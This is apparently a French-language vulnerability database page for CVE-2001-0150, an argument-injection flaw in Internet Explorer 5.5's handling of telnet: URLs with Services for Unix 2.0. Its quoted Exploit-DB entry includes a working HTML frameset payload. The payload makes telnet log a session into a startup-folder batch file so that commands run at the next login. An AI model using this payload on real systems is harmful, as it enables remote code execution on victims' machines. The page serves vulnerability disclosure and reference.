CVE-2001-0150 : Détail

CVE-2001-0150

A03-Injection
51.15%V3
Network
2001-05-07
02h00 +00:00
2004-09-02
07h00 +00:00
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Descriptions du CVE

Internet Explorer 5.5 and earlier executes Telnet sessions using command line arguments that are specified by the web site, which could allow remote attackers to execute arbitrary commands if the IE client is using the Telnet client provided in Services for Unix (SFU) 2.0, which creates session transcripts.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-88 Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')
The product constructs a string for a command to be executed by a separate component in another control sphere, but it does not properly delimit the intended arguments, options, or switches within that command string.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

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Informations sur l'Exploit

Exploit Database EDB-ID : 20680

Date de publication : 2001-03-08 23h00 +00:00
Auteur : Oliver Friedrichs
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/2463/info Services for Unix 2.0 contains a client side logging option which records all information exchanged in a telnet session. A vulnerability exists that could enable a remote user to invoke the telnet client and execute arbitrary commands on a target machine via IE. This is achieved by crafting a URL composed of command line parameters to the telnet client, which would invoke 'telnet.exe'. Telnet would connect to the host and initate the logging of session information, access to this file will allow an attacker to write and execute arbitrary commands which may be executed later. The following URL will cause IE to connect to the host and initiate the logging function: telnet:-f%20\file.txt%20host The following is an example of a malicious HTML message which could cause data that is received from the destination port on the host "host" to be written to the file "filename" in the startup directory for all users. If the logged in user has the appropriate permissions, a batch file will be created and executed upon future authentication. <html> <frameset rows="100%,*"> <frame src=about:blank> <frame src=telnet:-f%20\Documents%20and%Settings\All%20Users \start%20menu\programs\startup\start.bat%20host%208000> </frameset> </html>

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version To (including) 5.5

Références

http://www.osvdb.org/7816
Tags : vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/2463
Tags : vdb-entry, x_refsource_BID